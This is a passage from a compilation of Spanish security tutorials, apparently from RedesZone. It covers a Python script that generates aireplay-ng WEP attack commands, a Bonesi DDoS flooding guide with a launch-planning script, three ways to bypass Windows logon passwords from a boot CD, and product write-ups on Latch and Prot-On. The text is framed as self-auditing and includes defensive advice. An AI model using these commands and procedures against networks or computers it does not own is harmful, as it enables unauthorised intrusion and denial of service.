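                                    f"aireplay-ng -0 5 -a {bssid} -c {best['mac']} {iface}"]
            else:      # no client: fake-authenticate, then try chop-chop (may not work)
                plan["commands"] = [f"aireplay-ng -1 0 -a {bssid} {iface}",
                                    f"aireplay-ng -4 -b {bssid} {iface}"]
        plans.append(plan)
    return plans


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    for p in triage(aps, stations):
        print(f"{p['essid']:12} {p['bssid']} route={p['route']} ivs={p['ivs']} station={p['station']}")
        for cmd in p["commands"]:
            print("   ", cmd)
```

Run it against the real export with `parse_airodump_csv(open("capture-01.csv").read())`. The station with most packets is chosen as the `-h` source for aireplay-ng because a quiet client rarely produces the ARP requests the replay attack needs.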

Wireless auditing requires experience. At first things may not work exactly as described here; it takes some knowledge and care in the tests (especially when using external antennas pointed at the router). Check the MACs and identifiers of everything in detail: one wrong letter or digit can waste a lot of time before we notice it.

Of course, Wifislax, Wifiway and the aircrack-ng suite offer many more options, but this is what I have used to audit my network.

If you have tried other methods of generating traffic, leave a comment explaining how you did it so that we can add it to the manual and improve it together.

There are, of course, many pages on the internet with manuals of this kind, some more complete than others, but this is what has worked for me and I am sharing it; I think everything is explained clearly.

This manual was not written to hack or crack the neighbours' networks; it is a way to test the security of your own wireless networks, and we are not responsible for misuse of this information. If by following these steps you were able to get in, something is wrong and you should take the appropriate measures: in practice that means replacing WEP with WPA2 and changing the ISP default key, since the default key can be recovered from the SSID and BSSID alone.


Simulate DDoS attacks with Bonesi

Bonesi is an application for simulating DDoS attacks, generating traffic that appears to come from a botnet of many spoofed source addresses. It is especially useful for network administrators who want to check the security and stability of their systems in a simple way and correct any DDoS weaknesses before it is too late.

DDoS attacks are among the most common attacks against websites. In recent months they have been used as a form of protest against various organisations, taking the victim's website offline. Criminals also use them to take down a website and then blackmail or extort the victim.

Bonesi is open source, available for Linux, and can be downloaded from Google Code.

Once downloaded, unpack it and compile it for our system and architecture. Open a terminal (or a TTY) and run the following commands (the last one as root):

  • ./configure
  • make
  • make install

Once installed, check it by typing «bonesi» in the terminal; it should print the list of available parameters.

Launching an attack is very simple: type bonesi IP:PORT in the terminal, replacing IP with the address of the device under test and PORT with the port to attack.

In our case we attack the real machine from the Bugtraq 2 virtual machine, so we type bonesi 192.168.1.2:80 and press Enter.


We can see packets being sent from Bugtraq to the real machine. The Bugtraq machine is fully loaded while it runs, using 100% of its processor. This lets us check whether our equipment holds up against a DDoS attack or whether we are protected. In our case we noticed a slight drop in network speed, nothing serious, which is expected because the virtual machine is far less powerful than the real machine. Between machines of similar capacity the effect would be much more noticeable, and by running the attack from several devices at once we could see how far it can be pushed.

Bonesi accepts a large number of parameters, so it can be adapted to our needs. Its help output lists the following:

Usage: bonesi [OPTION...]
Options:

  • -i, --ips=FILENAME            file with the list of source IPs to spoof
  • -p, --protocol=PROTO          udp (default), icmp or tcp
  • -r, --send_rate=NUM           packets per second, 0 = unlimited (default)
  • -s, --payload_size=SIZE       size of the payload (default: 32)
  • -o, --stats_file=FILENAME     file for the statistics (default: 'stats')
  • -c, --max_packets=NUM         maximum number of packets (requests for tcp/http), 0 = unlimited (default)
  •     --integer                 IPs in the list are integers in host byte order instead of dotted notation
  • -t, --max_bots=NUM            pick max_bots addresses at random within each 24-bit prefix (1-256)
  • -u, --url=URL                 the URL to request (default: '/') (tcp/http only)
  • -l, --url_list=FILENAME       file with a list of URLs (tcp/http only)
  • -b, --useragent_list=FILENAME file with a list of user agents (tcp/http only)
  • -d, --device=DEVICE           network device to listen on (tcp/http only)
  • -m, --mtu=NUM                 set the MTU (default 1500)
  • -f, --frag=NUM                fragmentation mode (0 = IP, 1 = TCP, default: 0)
  • -v, --verbose                 print additional debug messages
  • -h, --help                    print this message and exit

Although still in beta, bonesi 0.2 is a very stable tool that gives good results when checking how our servers stand up to these attacks.
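Because Bonesi spoofs its source addresses, the victim cannot tell who really sent the flood, so the one check worth automating before pressing Enter is that the target is a machine you own. The following script is an added example, not part of the original article or of Bonesi itself: it writes the source list that the -i option reads, refuses any target outside an assumed lab range, estimates the bandwidth a given -r/-s/-p combination will generate, and assembles the command line from the options listed above. LAB_NETS and LINK_BPS are assumptions for a home lab; the requirement that tcp mode carry -d follows from the help text marking that option as tcp/http only.

```python
# Added example (not part of the original article or of Bonesi): plan a Bonesi
# run before launching it. LAB_NETS and LINK_BPS are assumptions for a home lab.
import ipaddress
import random

LAB_NETS = [ipaddress.ip_network("192.168.1.0/24")]   # assumption: addresses we own
LINK_BPS = 100_000_000                                 # assumption: 100 Mbit/s lab link
IP_HEADER = 20
L4_HEADER = {"udp": 8, "tcp": 20, "icmp": 8}          # fixed header sizes, no options


def make_bot_list(prefix, count, seed=None):
    """Distinct spoofed sources inside `prefix`, one per line as -i expects
    (dotted notation; use --integer only if you write integers instead)."""
    hosts = list(ipaddress.ip_network(prefix).hosts())
    if not 1 <= count <= len(hosts):
        raise ValueError(f"{prefix} has only {len(hosts)} usable hosts")
    return [str(h) for h in random.Random(seed).sample(hosts, count)]


def check_target(target):
    """Parse IP:PORT and refuse anything outside the lab ranges."""
    host, sep, port = target.rpartition(":")
    if not sep:
        raise ValueError("target must be IP:PORT")
    ip, port = ipaddress.ip_address(host), int(port)
    if not 0 < port < 65536:
        raise ValueError(f"bad port {port}")
    if not any(ip in net for net in LAB_NETS):
        raise ValueError(f"{ip} is outside the lab ranges {LAB_NETS}")
    return ip, port


def is_lab_target(target):
    """Boolean form of check_target for callers that only want a yes/no."""
    try:
        check_target(target)
        return True
    except ValueError:
        return False


def estimate_load(send_rate, payload_size=32, protocol="udp", mtu=1500):
    """Bits per second for the chosen -r/-s/-p. A send_rate of 0 is Bonesi's
    default, unlimited: it is CPU-bound (the 100% processor use seen above)
    and cannot be predicted here, so None is returned."""
    frame = IP_HEADER + L4_HEADER[protocol] + payload_size
    if frame > mtu:   # Bonesi would fragment; count the extra IP headers
        extra = -(-(frame - mtu) // (mtu - IP_HEADER))
        frame += extra * IP_HEADER
    if send_rate == 0:
        return None
    bps = send_rate * frame * 8
    return {"bytes_per_packet": frame, "bps": bps, "link_fraction": bps / LINK_BPS}


def build_command(target, bots_file, protocol="udp", send_rate=0,
                  payload_size=32, max_packets=0, device=None):
    """argv for bonesi using only options from its help output."""
    ip, port = check_target(target)
    argv = ["bonesi", "-i", bots_file, "-p", protocol, "-r", str(send_rate),
            "-s", str(payload_size), "-c", str(max_packets)]
    if protocol == "tcp":
        if device is None:   # the help lists -d as tcp/http only; insist on it there
            raise ValueError("tcp/http mode needs -d DEVICE to read the replies")
        argv += ["-d", device]
    return argv + [f"{ip}:{port}"]


if __name__ == "__main__":
    bots = make_bot_list("10.0.0.0/24", 50, seed=1)
    with open("bots.txt", "w") as fh:
        fh.write("\n".join(bots) + "\n")
    print(estimate_load(5000, 512))
    print(" ".join(build_command("192.168.1.2:80", "bots.txt",
                                 send_rate=5000, payload_size=512)))
```

With -r 5000 and -s 512 the UDP estimate is about 21.6 Mbit/s, roughly a fifth of a 100 Mbit/s link, which is what you want for a first run: enough to see the target's behaviour, not enough to knock the lab switch over. Leave -r at 0 only once you know the link can take whatever the sending machine's CPU manages.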


Latch: Protect your digital identities

Latch is a system that protects access to our digital identities by adding an additional layer of security. It lets us control access to an account from our smartphone: we can keep access to a given service blocked from the phone, and if someone tries to log in while the "latch" is closed, they will not get in even with the correct password, and we will be notified of the attempt.

In this way, if an attacker obtains our credentials, they still cannot log in while Latch is denying connections. Users can link bank accounts, social networks, SSH servers, OpenVPN servers and other services quickly and easily; to use them we must first allow the connection from our smartphone.

It works much like two-step authentication: to log in we must provide something we know (username and password) and use something we have (our smartphone with Latch). Latch can also generate a One Time Password (OTP), so that in addition to our usual credentials we must enter the one-time password generated by the application. That way, if someone tries to access the service while the latch is open, they are asked for a password they do not have. As an additional feature, a service can be scheduled to block automatically during certain time intervals, ideal while we are asleep, and detailed statistics of users and access attempts can be viewed from the developer control panel.

The following diagram (general Latch architecture) shows how Latch works in a very simplified way.

Currently Latch is compatible with services from Telefónica, Movistar, Acens, Tuenti, Grupo Cortefiel and Cajamar, among others. SDKs and plugins can also be downloaded to integrate it easily with your own service or web application; the available languages are Microsoft .NET, Ruby, C, Python, PHP and Java.

We recommend visiting the official Latch website, where you will find the documentation and everything needed to use Latch as a user, and to integrate it into your services as an administrator.

In RedesZone we have written manuals on adding Latch to services such as OpenSSH and OpenVPN, so that our servers stay under control. You can access the manuals below:


How to access Windows 7 with the administrator user without knowing the password

There are several utilities for this; the one we will use is included in the Hiren's Boot CD utilities disc.

Hiren's Boot CD is a live CD of essential utilities for troubleshooting computers: boot problems, partitions, BIOS, startup and more. Among its many useful programs are tools to remove Windows user passwords. The full list of applications is on the official website.

One of the applications on this CD is WindowsGate 1.1, which disables Windows password verification; useful when you have forgotten a user's password and need to get into the account quickly.

To remove the password, first download and burn Hiren's Boot CD. Then boot the computer from it; a menu appears listing all the applications on the live CD.

Select and start the «Mini Windows XP» option to boot a Windows XP environment from the live CD.

Once it has started we see a desktop with a number of pre-installed applications. To run WindowsGate 1.1, click the start menu («Start») and then, at the top, HBCD Menu.

From there, open the «Programs» menu and then Passwords & Keys / Windows Login / WindowsGate, and the application starts.

WindowsGate starts as shown in the screenshot:

Select from the list the operating system whose password verification we want to disable and tick the «msv1_0.dll patch» box; a message confirms that it worked: «Logon password validation is OFF». (WindowsGate patches msv1_0.dll, the local authentication package, on disk, so that the logon accepts any password.)

Now restart, remove the Hiren's Boot CD and boot into our system. When it asks for the administrator's (or any user's) password, we can type anything or leave it blank, and the system logs into that user without complaint.

After following this tutorial we can access the Windows account whose password we had forgotten. Bear in mind that while the patch is in place every local account accepts any password, so revert it from WindowsGate once you have regained access.

Another way to access a Windows system when we have forgotten the password is to delete the password of one specific user, while keeping validation in place for the other users.

For this we use «Offline NT/2000/XP/Vista/7 Password Changer», also included in Hiren's Boot CD. It does not need Mini Windows XP: it boots into its own command-line environment.

To open it, select the Password Reset menu and then «Offline NT/2000/XP/Vista/7 Password Changer».

The program loads. First it asks which partition holds the Windows installation; in our case there are two partitions, one for BOOT and one for Windows 7, so we select the Windows 7 one and press Enter.

Next it asks for the path to the registry directory. It usually detects it automatically, so pressing Enter continues the process.

The program loads the necessary registry hives and asks what we want to do. We select option 1, the default, and continue.

We select the default option «Edit user data and password».

Now we see the users in the system; select the one whose password we want to reset, in our case the administrator «ruvelro», and press Enter.

A «User Edit Menu» appears with several options, notably option 1, which sets a blank password, and option 2, which lets us set a new password of our choice. We pick the one we want, in our case 1, to clear the password and log in without one.

A message says «Password cleared» and more options are offered. Now we exit the program: at the user selection prompt press ! to leave the user editor, then q to quit. It asks whether to write the changes (the password removal); answer y and press Enter, and the changes are written to the SAM hive.

A message «EDIT COMPLETE» confirms that the changes were made. We can now restart the machine, remove the Hiren's Boot CD and log into Windows without problems, choosing the user whose password we removed.

Kon-Boot

Another option for logging into a system whose password we have forgotten is Kon-Boot, also included in Hiren's Boot CD.

This application lets us log into the system as administrator without changing the password or disabling validation, unlike the other methods: it patches the Windows kernel in memory while the system boots, so nothing on disk is modified and the change disappears on the next normal boot.

Kon-Bot is compatible with:

  • Microsoft Windows XP 32Bit / 64Bit
  • Microsoft Windows Server 2003 32Bit / 64Bit
  • Microsoft Windows Server 2008 32Bit / 64Bit
  • Microsoft Windows Vista 32Bit / 64Bit
  • Microsoft Windows 7 32Bit / 64Bit
  • Microsoft Windows 8 32Bit / 64Bit (BIOS version, not EFI)
  • Some Linux systems.

To use it, boot the computer from Hiren's Boot CD, select the «Password Reset» section and choose Kon-Boot.

An ASCII animation appears; press Enter to continue.

The program applies its patches and then boots the operating system, logging in as administrator with nothing else required.

With this, we can access our system without a password. Note that all three tools depend on booting another operating system from removable media and reading or patching an unencrypted Windows installation: a firmware (BIOS/UEFI) boot password that blocks booting from CD or USB, together with full-disk encryption such as BitLocker, prevents all of them.

We can also try to crack the administrator password and log in with it directly; we already published that manual here: Hack Windows administrator: Enter Windows administrator account without administrator password


Protect and easily manage the permissions of your personal files

In this short tutorial we will show how to use the Prot-On program and, above all, what it is for, since it is a fairly new application.

Prot-On is an application for managing the files we share efficiently and securely, letting us know who accesses them, how and when.

Prot-On is available for Windows, Mac, iOS and Android. We can try it from its main website.

The first thing to do is register on its website to start using the program. Click «Register in Prot-On» and fill in the form that appears.

An email is sent to our address to confirm the account, after which we can start using Prot-On.

Next, download the application to our Android device from the Play Store.

Once installed, it creates an icon in the applications menu; tap it to run the application.

The user licence appears, which we must accept, followed by a window asking whether we are a new user or already registered. If we registered earlier, tap «I am already a user» and two boxes appear for our username and password.

Enter them and a short introductory guide appears. Tap Next several times until we reach the program's main window.

To share and protect an image, tap the third button at the top right of the screen; the gallery opens so we can browse the images stored on the device. Select the image we want and it is automatically shared and protected.

Tapping the saved image opens a preview, with a menu at the top right. Tapping the key-shaped icon lets us manage the photo's permissions.

We can also share the image through Dropbox or send it securely by email, and tapping the clock-shaped button opens a web browser with an activity window showing everything that has happened to the protected image.

We can also delete the shared image by tapping the trash can icon.

From the Prot-On website we can easily access our shared files and manage the permissions and activity of our files in more detail.

We can also create groups of Prot-On users with whom to share files.

Prot-On has a limited free version and a €40-per-year licence that extends the permissions to editing, copying and management.

Prot-On reminds us a lot of Google Drive, where you can give people permission to view or edit a file, or no access at all. If we revoke the permissions, the person can no longer see the file (an internet connection is required to open the files).

If we want offline viewing, we must buy the premium version and set a time window during which the file can be viewed; when it expires, an internet connection is needed again.

There are practical examples on its main website.

Manual made by Rubén Velasco (ruvelro) for RedesZone.net.

Manual exclusively for RedesZone.net

Its total or partial reproduction without the consent of the author.